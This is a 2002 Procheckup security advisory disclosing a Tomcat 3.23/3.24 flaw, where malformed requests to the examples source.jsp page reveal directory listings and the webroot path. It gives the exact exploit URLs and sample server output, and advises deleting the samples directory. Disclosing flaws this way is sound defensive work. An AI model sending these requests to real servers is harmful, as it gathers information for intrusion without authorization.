OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: webmasterprocheckup.com
Date: Wed May 29 2002 - 08:31:27 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ('binary' encoding is not supported, stored as-is) Procheckup Ltd
    www.procheckup.com

    Procheckup Security Bulletin PR02-05

               
      Description: Tomcat source.jsp directory listing and
    webroot location display
             Date: 8/1/2002

      Application: Apache Tomcat Java server versions 3.23 and
    3.24
         Platform: Linux/Unix
         Severity: Remote attackers can obtain listings of web
    directories and sometines the location of webroot
          Authors: Richard Brain [richard.brainprocheckup.com]
    Vendor Status:
    CVE Candidate: Not assigned
        Reference: www.procheckup.com/security_info/vuln.html


     Description:

    Tomcat is the free opensource Java server,
    http://jakarta.apache.org/tomcat/.

    Normally source.jsp is used to look at the source code of
    programs within the examples directories. A typical
    request is
    http://webserver:80/examples/jsp/source.jsp?/jsp/num/numgues
    s.jsp.
    We have found by using source.jsp with a malformed input a
    directory listing is displayed and the location of the
    webroot is sometimes disclosed.

    The vulnerabilities may only work on port 8080 rather than
    port 80, dependant on how the webserver has been configured
    with Tomcat.

    Exploits

    A) Requesting the following url :-

    http://webserver:80/examples/jsp/source.jsp??

    Gives the directory listing and webroot on 3.23, 3.24 just
    gives a directory listing.

    <title>Directory Listing</title>
    <base
    href="file://localhost/"WEBROOT"/webapps/examples/"><h1>/"WE
    BROOT"/webapps/examples</h1>
    <hr>
    <img align=middle src="doc:/lib/images/ftp/directory.gif"
    width=32 height=32>
    <a href="images">images</a><br><img align=middle
    src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
    <a href="jsp">jsp</a><br><img align=middle
    src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
    <a href="META-INF">META-INF</a><br><img align=middle
    src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
    <a href="servlets">servlets</a><br><img align=middle
    src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
    <a href="WEB-INF">WEB-INF</a><br>

    B) Requesting the following url :-

    http://webserver:80/examples/jsp/source.jsp?/jsp/

    Gives the directory listing and webroot on 3.23, 3.24 just
    gives a directory listing on a subdirectory.
    <title>Directory Listing</title>
    <base
    href="file://localhost/"WEBROOT"/webapps/examples/jsp/"><h1>
    /"WEBROOT"/webapps/examples/jsp</h1>
    <hr>
    <img align=middle src="doc:/lib/images/ftp/directory.gif"
    width=32 height=32>
    <a href="cal">cal</a><br><img align=middle
    src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
    <a href="checkbox">checkbox</a><br><img align=middle
    src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
    <a href="colors">colors</a><br><img align=middle
    src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
    <a href="dates">dates</a><br><img align=middle
    src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
    <a href="error">error</a><br><img align=middle
    src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
    <a href="forward">forward</a><br><img align=middle
    src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
    <a href="include">include</a><br><img align=middle
    src="doc:/lib/images/ftp/file.gif" width=32 height=32>
    <a href="index.html">index.html</a><br><img align=middle
    src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
    <a href="jsptoserv">jsptoserv</a><br><img align=middle
    src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
    <a href="num">num</a><br><img align=middle
    src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
    <a href="plugin">plugin</a><br><img align=middle
    src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
    <a href="security">security</a><br><img align=middle
    src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
    <a href="sessions">sessions</a><br><img align=middle
    src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
    <a href="simpletag">simpletag</a><br><img align=middle
    src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
    <a href="snp">snp</a><br><img align=middle
    src="doc:/lib/images/ftp/file.gif" width=32 height=32>
    <a href="source.jsp">source.jsp</a><br>

       Solution:
      Delete the samples directory if not needed.

          Legal:

      Copyright 2002 Procheckup Ltd. All rights reserved.


      Permission is granted for copying and circulating this
    Bulletin
      to the Internet community for the purpose of alerting
    them to problems
      , if and only if, the Bulletin is not edited or changed
    in any way,
      is attributed to Procheckup, and provided such
    reproduction and/or
      distribution is performed for non-commercial purposes.


      Any other use of this information is prohibited.
    Procheckup is not
      liable for any misuse of this information by any third
    party.